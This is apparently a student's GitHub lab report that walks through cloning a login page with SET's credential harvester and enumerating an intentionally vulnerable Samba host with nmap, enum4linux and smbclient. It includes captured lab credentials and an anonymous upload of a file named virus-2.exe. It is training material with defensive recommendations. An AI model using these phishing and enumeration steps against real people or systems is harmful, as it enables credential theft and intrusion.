Skip to content

Aliu2211/Website-Cloning-SMB-Lab

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 

Repository files navigation

🔐 Website Cloning & SMB Vulnerability Scanning Labs

SET Enum4Linux Status License

Practical lab documentation covering website cloning with the Social Engineering Toolkit (SET) and SMB vulnerability scanning with Enum4Linux, completed as part of ParoCyber Ethical Hacking Training.

⚠️ DISCLAIMER: These techniques are for educational and authorized testing purposes only. Unauthorized use against systems you don't own or have explicit permission to test is illegal.


📋 Table of Contents


🎯 Objectives

The objectives of these labs are to:

  1. Understand website cloning as a social engineering attack vector
  2. Learn how credential harvesting works in phishing attacks
  3. Explore SMB vulnerabilities common in Windows networks
  4. Master Enum4Linux for SMB enumeration and vulnerability detection
  5. Recognize the importance of ethical boundaries in security testing

🖥️ Lab Environment

Component Details
Attacker Machine Kali Linux
Target Network 172.17.0.0/24
Target Host (SMB) 172.17.0.2 (metasploitable.vm)
Target Host (Website Cloning) 10.6.6.1 (Attacker) → http://dvwa.vm (Cloned)
Samba Version Samba 3.0.20-Debian
Tools Used Social Engineering Toolkit (SET) v8.0.3, Enum4Linux v0.9.1, Nmap 7.94, SMBClient
Protocols HTTP, SMB (445, 139)

🌐 Part 1: Website Cloning Lab

What is Website Cloning?

Website cloning is a technique used in social engineering attacks where an attacker creates an exact replica of a legitimate website. The goal is to trick users into entering sensitive information (credentials, credit card numbers, etc.) on the fake site.

Attack Flow:

Victim → Phishing Link → Cloned Website → Credentials Captured → Attacker

Tool: Social Engineering Toolkit (SET)

The Social Engineering Toolkit (SET) is an open-source penetration testing framework designed for social engineering attacks.

Version Used: 8.0.3 (Codename: 'Maverick')

SET includes modules for:

  • Credential harvesting
  • Website cloning
  • Phishing attacks
  • Payload delivery

Step-by-Step Process

Step 1: Launch SET

sudo setoolkit

Output:

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 8.0.3
                    Codename: 'Maverick'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]

Screenshot:

SET Launch


Step 2: Select Website Attack Vectors

From the main menu, select:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors          <-- SELECT THIS
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
...

set> 2

Screenshot:

SET Menu


Step 3: Select Credential Harvester Attack

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method    <-- SELECT THIS
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method

set:webattack> 3

Screenshot:

Credential Harvester


Step 4: Select Site Cloner

1) Web Templates
2) Site Cloner       <-- SELECT THIS
3) Custom Import

set:webattack> 2

Screenshot:

Site Cloner


Step 5: Enter Attacker IP Address

Enter your Kali machine's IP address (this is where the cloned site will be hosted):

set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.0.2.15]: 10.6.6.1

Screenshot:

Enter IP


Step 6: Enter Target URL to Clone

Enter the URL of the website you want to clone. In this lab, we cloned DVWA (Damn Vulnerable Web Application):

[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone: http://dvwa.vm

Screenshot:

Clone URL


Step 7: Cloned Site Running

SET will:

  1. Download the target website
  2. Modify forms to POST credentials to your server
  3. Start a web server on port 80
[*] Cloning the website: http://dvwa.vm
[*] This could take a little bit...

The best way to use this attack is if username and password form 
fields are available. Regardless, this captures all POSTs on a website.

[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

Screenshot:

Site Running


Step 8: Credentials Captured!

When the victim visits the cloned site and enters credentials:

10.6.6.1 - - [18/Dec/2025 23:29:05] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=aliu
POSSIBLE PASSWORD FIELD FOUND: password=icorrectpassword!120-
POSSIBLE USERNAME FIELD FOUND: Login=Login
POSSIBLE USERNAME FIELD FOUND: user_token=6391a9b968b49f960ec449e7f6000a1f
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

10.6.6.1 - - [18/Dec/2025 23:32:30] "POST /index.html HTTP/1.1" 302 -

Captured Data:

Field Value
Username aliu
Password icorrectpassword!120-
User Token 6391a9b968b49f960ec449e7f6000a1f

Screenshot:

Credentials Captured


How It Works

┌─────────────────────────────────────────────────────────────┐
│                    ATTACK FLOW                               │
├─────────────────────────────────────────────────────────────┤
│                                                              │
│  1. Attacker clones legitimate website                       │
│                    ↓                                         │
│  2. Attacker sends phishing link to victim                   │
│                    ↓                                         │
│  3. Victim clicks link → sees familiar login page            │
│                    ↓                                         │
│  4. Victim enters credentials                                │
│                    ↓                                         │
│  5. Credentials sent to attacker's server                    │
│                    ↓                                         │
│  6. Victim redirected to real site (unaware of attack)       │
│                                                              │
└─────────────────────────────────────────────────────────────┘

Ethical Considerations

⚠️ IMPORTANT: This technique must ONLY be used for:

  • ✅ Authorized penetration testing engagements
  • ✅ Security awareness training demonstrations
  • ✅ Educational purposes in controlled lab environments
  • ✅ Testing your own systems

NEVER use for:

  • ❌ Unauthorized access to accounts
  • ❌ Stealing real credentials
  • ❌ Targeting individuals without consent
  • ❌ Any malicious purposes

🔍 Part 2: SMB Vulnerability Scanning

What is SMB?

SMB (Server Message Block) is a network protocol used for:

  • File sharing
  • Printer sharing
  • Inter-process communication
  • Network browsing

Common SMB Ports:

Port Service
139 NetBIOS Session Service
445 SMB Direct (Microsoft-DS)

Why SMB is a Target:

  • Often misconfigured
  • Legacy versions have known vulnerabilities (EternalBlue, MS17-010)
  • Can leak sensitive information (usernames, shares, policies)

Tool: Enum4Linux

Enum4Linux is a Linux tool for enumerating information from Windows and Samba systems.

Version Used: v0.9.1

It can extract:

  • User lists
  • Share lists
  • Group membership
  • Password policies
  • OS information

Target Setup

Setting Value
Target IP 172.17.0.2
Target Name metasploitable.vm
Target OS Metasploitable (Samba 3.0.20-Debian)
Ports 139, 445
Workgroup WORKGROUP

Step 1: Host Discovery with Nmap

First, we identify live hosts on the network:

sudo nmap -sN 172.17.0.0/24

Output:

Starting Nmap 7.94 ( https://nmap.org ) at 2025-12-19 18:41 UTC
Nmap scan report for metasploitable.vm (172.17.0.2)
Host is up (0.000020s latency).
Not shown: 982 closed tcp ports (reset)
PORT     STATE         SERVICE
21/tcp   open|filtered ftp
22/tcp   open|filtered ssh
23/tcp   open|filtered telnet
25/tcp   open|filtered smtp
80/tcp   open|filtered http
111/tcp  open|filtered rpcbind
139/tcp  open|filtered netbios-ssn
445/tcp  open|filtered microsoft-ds
512/tcp  open|filtered exec
513/tcp  open|filtered login
514/tcp  open|filtered shell
1099/tcp open|filtered rmiregistry
1524/tcp open|filtered ingreslock
2121/tcp open|filtered ccproxy-ftp
3306/tcp open|filtered mysql
5432/tcp open|filtered postgresql
6667/tcp open|filtered irc
8180/tcp open|filtered unknown
MAC Address: 02:42:AC:11:00:02 (Unknown)

Nmap done: 256 IP addresses (2 hosts up) scanned in 5.36 seconds

Screenshot:

Nmap Scan


Step 2: Full Enumeration with Enum4Linux

enum4linux -a 172.17.0.2

Explanation:

  • -a — Runs all simple enumeration options (-U -S -G -P -r -o -n -i)

Target Information Retrieved:

Target ........... 172.17.0.2
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''

[+] Got domain/workgroup name: WORKGROUP
[+] Server 172.17.0.2 allows sessions using username '', password ''

OS Information:

METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)
platform_id     :       500
os version      :       4.9
server type     :       0x9a03

Screenshot:

Enum4Linux All Enum4Linux All Enum4Linux All Enum4Linux All


Step 3: User Enumeration

enum4linux -U 172.17.0.2

Users Discovered (35 accounts):

Account RID Description
root 0x3e8 Root user
msfadmin 0xbb8 Metasploitable admin
user 0xbba Just a user
postgres 0x4c0 PostgreSQL administrator
mysql 0x4c2 MySQL Server
www-data 0x42a Web server user
ftp 0x4be FTP service
sshd 0x4b8 SSH daemon
tomcat55 0x4c4 Tomcat server
service 0xbbc Service account

Full User List:

user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x402]
user:[syslog] rid:[0x4b4]
user:[user] rid:[0xbba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[postgres] rid:[0x4c0]
user:[bin] rid:[0x3ec]
user:[mail] rid:[0x3f8]
user:[distccd] rid:[0x4c6]
user:[proftpd] rid:[0x4ca]
user:[dhcp] rid:[0x4b2]
user:[daemon] rid:[0x3ea]
user:[sshd] rid:[0x4b8]
user:[man] rid:[0x3f4]
user:[lp] rid:[0x3f6]
user:[mysql] rid:[0x4c2]
user:[gnats] rid:[0x43a]
user:[libuuid] rid:[0x4b0]
user:[backup] rid:[0x42c]
user:[msfadmin] rid:[0xbb8]
user:[telnetd] rid:[0x4c8]
user:[sys] rid:[0x3ee]
user:[klog] rid:[0x4b6]
user:[postfix] rid:[0x4bc]
user:[service] rid:[0xbbc]
user:[list] rid:[0x434]
user:[irc] rid:[0x436]
user:[ftp] rid:[0x4be]
user:[tomcat55] rid:[0x4c4]
user:[sync] rid:[0x3f0]
user:[uucp] rid:[0x3fc]

Screenshot:

User Enumeration User Enumeration

Step 4: Share Enumeration

enum4linux -S 172.17.0.2

Shares Discovered:

Sharename Type Comment Access
print$ Disk Printer Drivers DENIED
tmp Disk oh noes! OK ⚠️
opt Disk DENIED
IPC$ IPC IPC Service N/A
ADMIN$ IPC IPC Service DENIED

Critical Finding: The tmp share is accessible anonymously!

//172.17.0.2/tmp        Mapping: OK Listing: OK Writing: N/A

Screenshot:

Share Enumeration


Step 5: Password Policy Enumeration

enum4linux -P 172.17.0.2

Password Policy Retrieved:

[+] Found domain(s):
        [+] METASPLOITABLE
        [+] Builtin

[+] Password Info for Domain: METASPLOITABLE

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: Not Set
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set

Password Complexity: Disabled
Minimum Password Length: 0

Screenshot:

Password Policy Password Policy

Step 6: SMB Client Connection

List Available Shares

smbclient -L //172.17.0.2/

Output:

Password for [WORKGROUP\root]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))

Screenshot:

SMBClient List


Connect to Accessible Share

smbclient //172.17.0.2/tmp

Output:

Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Dec 19 18:45:32 2025
  ..                                 DR        0  Mon Aug 14 10:39:59 2023
  .X11-unix                          DH        0  Mon Aug 14 10:35:14 2023
  groupwork.txt                       A      108  Fri Dec 19 18:21:06 2025
  gconfd-msfadmin                    DR        0  Thu Dec 11 11:25:33 2025
  orbit-msfadmin                     DR        0  Thu Dec 11 11:25:33 2025
  ...

                38497656 blocks of size 1024. 8790560 blocks available

Testing Write Access

smb: \> put virus-2.exe groupwork-2.txt
putting file virus-2.exe as \groupwork-2.txt (5.1 kb/s) (average 5.1 kb/s)

Critical Finding: The share allows anonymous file uploads! ⚠️

Screenshot:

SMBClient Access


Findings Summary

Vulnerabilities Identified

Finding Severity Description
Null Session Allowed 🔴 HIGH Anonymous enumeration of users, shares, and policies
Anonymous Share Access 🔴 HIGH tmp share accessible without authentication
Writable Share 🔴 CRITICAL Anonymous users can upload files to tmp
No Password Complexity 🟠 MEDIUM Weak passwords allowed
No Account Lockout 🟠 MEDIUM Brute force attacks possible
35 User Accounts Exposed 🟠 MEDIUM Full user list leaked
Outdated Samba Version 🔴 HIGH Samba 3.0.20 has known vulnerabilities

Security Recommendations

Issue Recommendation
Null Sessions Disable anonymous access via SMB configuration
Writable Shares Remove write permissions for anonymous users
Password Policy Enforce complexity and minimum length of 12+ characters
Account Lockout Enable lockout after 5 failed attempts
Samba Version Upgrade to latest supported version
User Enumeration Restrict RID cycling and anonymous SID lookups

💡 Key Learnings

Website Cloning Insights

  • Social engineering exploits human trust, not technical vulnerabilities
  • SET makes cloning trivially easy — a functional phishing site in under 5 minutes
  • Credential harvesting captures everything — usernames, passwords, tokens
  • User awareness training is critical for defense
  • URL inspection is the best defense against cloned sites

SMB Vulnerability Insights

  • Null sessions are devastating — we extracted 35 usernames without any credentials
  • Anonymous shares are dangerous — the tmp share allowed file uploads
  • Outdated Samba (3.0.20) has known exploits (including potential RCE)
  • Password policy was weak — no complexity, no lockout threshold
  • Enumeration alone is powerful — no exploitation needed to gather critical intel

Real-World Attack Scenarios

From this lab, an attacker could:

  1. Use harvested usernames for password spraying attacks
  2. Upload malicious files to the writable tmp share
  3. Exploit Samba 3.0.20 vulnerabilities (CVE-2007-2447)
  4. Combine phishing with SMB access for lateral movement

Defensive Recommendations

Attack Vector Defense
Website Cloning User training, email filtering, URL inspection, MFA
Null Sessions Disable anonymous access in SMB configuration
Writable Shares Remove write permissions, audit share access
User Enumeration Restrict anonymous SID/name translation
Weak Passwords Enforce complexity, minimum 12 characters
No Lockout Enable account lockout after 5 failed attempts
Outdated Software Upgrade Samba to latest version

📚 References


👤 Author

Aliu Tijani
Ethical Hacking Student | ParoCyber Training Program

LinkedIn GitHub


📄 License

This project is licensed under the MIT License - see the LICENSE file for details.


Created as part of ParoCyber Ethical Hacking Training — December 2025

About

Hands-on ethical hacking labs on website cloning (SET) and SMB vulnerability scanning (Enum4Linux), including methodology, findings, and defensive recommendations.

Topics

Resources

License

Stars

0 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors